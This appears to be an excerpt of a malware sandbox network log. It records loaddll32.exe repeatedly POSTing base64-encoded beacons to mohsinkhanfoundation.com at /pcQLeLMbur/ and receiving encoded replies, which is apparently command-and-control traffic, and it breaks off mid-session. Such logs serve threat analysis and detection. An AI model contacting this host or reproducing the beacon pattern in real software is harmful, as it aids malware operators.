                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:10.890607119 CEST1550OUTPOST /pcQLeLMbur/P3glHSkheRgAfBMIMgUiKCMaGD4dK0J9dnlkenp3ZXhlew== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:11.326118946 CEST1564INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:10 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8fUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          32192.168.2.749811107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:11.588450909 CEST1571OUTPOST /pcQLeLMbur/HiQBOhomAh0dCDgeJjoHLj8YCUZ6c3lifn1yZX5hfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:12.021758080 CEST1573INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:11 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8fUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          33192.168.2.749813107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:12.289050102 CEST1581OUTPOST /pcQLeLMbur/BhkbJH0afC8dDiEzQn12eWR6endleGV7 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:12.714524984 CEST1582INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:12 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8fkJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          34192.168.2.749815107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:12.989154100 CEST1590OUTPOST /pcQLeLMbur/ACA4KhwTDH8VH3MrOQp8GAYHIjZ4egBFfnJ4ZX15c2R5Yng= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:13.383555889 CEST1592INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:13 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8f0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          35192.168.2.749817107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:13.650248051 CEST1593OUTPOST /pcQLeLMbur/MSMDOB0pBQ5+OnNDenV9ZXt9dGF5ZHw= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:14.036498070 CEST1601INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:13 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 66 30 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8f0JBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          36192.168.2.749819107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:14.286284924 CEST1603OUTPOST /pcQLeLMbur/PQAbfw19HyI5fiwAe38AIyccOiF8BwI+diQOQn12eWR6endleGV7 HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:14.689887047 CEST1611INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:14 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 65 45 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8eEJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          37192.168.2.749821107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:14.941658974 CEST1612OUTPOST /pcQLeLMbur/H0N6dX1le310YXlkfA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:15.382468939 CEST1620INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:14 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 65 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8eUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          38192.168.2.749822107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:15.619729996 CEST1622OUTPOST /pcQLeLMbur/E30FFQogECw2GiUzekV+cnhlfXlzZHlieA== HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:15.999859095 CEST1624INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:15 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 65 55 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8eUJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          39192.168.2.749824107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:26:16.257204056 CEST1631OUTPOST /pcQLeLMbur/PAUpKBYYDz0bHQkGMRZ/eSJCfXZ5ZHp6d2V4ZXs= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:26:16.725260973 CEST1634INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:26:16 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 0d 0d 0d 09 09 09 0a 0a 0a 65 58 70 37 51 55 56 43 51 30 46 42 66 6e 31 35 65 58 74 35 66 48 74 38 65 6b 4a 42 51 30 4a 47 51 6e 70 79 66 6d 4a 2b 63 33 4e 6c 66 58 70 37 5a 48 78 2b 51 6b 46 44 51 6b 5a 43 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 56 43 51 55 4e 43 52 6b 49 46 42 51 55 4a 51 6b 46 44 51 6b 5a 43 42 51 55 46 43 55 4a 42 51 30 4a 47 51 67 55 46 42 51 6c 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 5a 42 52 55 4a 44 51 55 46 43 51 55 4e 43 52 6b 4a 47 51 45 4a 46 52 55 5a 48 51 55 56 47 51 55 64 47 52 6b 5a 43 51 45 59 3d 0a 0a 0a 09 09 09 0d 0d 0d
                                          Data Ascii: eXp7QUVCQ0FBfn15eXt5fHt8ekJBQ0JGQnpyfmJ+c3NlfXp7ZHx+QkFDQkZCfX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkVCQUNCRkIFBQUJQkFDQkZCBQUFCUJBQ0JGQgUFBQlCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEZBRUJDQUFCQUNCRkJGQEJFRUZHQUVGQUdGRkZCQEY=


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.749754107.180.44.12580C:\Windows\System32\loaddll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Sep 27, 2021 20:25:48.740844011 CEST1009OUTPOST /pcQLeLMbur/LjI+JSoqJQ4lBiwyAhR7KngvHgopKBhFfnJ4ZX15c2R5Yng= HTTP/1.1
                                          Host: mohsinkhanfoundation.com
                                          Content-Length: 80
                                          Data Raw: 66 58 35 35 66 6e 5a 2f 51 30 49 43 41 41 55 50 51 6b 55 4d 63 52 59 65 50 79 6f 35 4f 52 63 71 50 53 51 6b 50 79 67 71 4f 43 45 58 44 54 38 37 44 69 6f 34 4c 68 63 59 4a 43 30 69 49 69 51 73 52 55 59 61 43 51 51 46 41 77 51 62 51 6b 55 3d 0d 0a 0d 0a
                                          Data Ascii: fX55fnZ/Q0ICAAUPQkUMcRYePyo5ORcqPSQkPygqOCEXDT87Dio4LhcYJC0iIiQsRUYaCQQFAwQbQkU=
                                          Sep 27, 2021 20:25:49.168261051 CEST1019INHTTP/1.1 200 OK
                                          Date: Mon, 27 Sep 2021 18:25:48 GMT
                                          Server: Apache
                                          X-Powered-By: PHP/7.2.34
                                          Upgrade: h2,h2c
                                          Connection: Upgrade
                                          Content-Length: 270
                                          Vary: Accept-Encoding,User-Agent
                                          Content-Type: text/html; charset=UTF-8
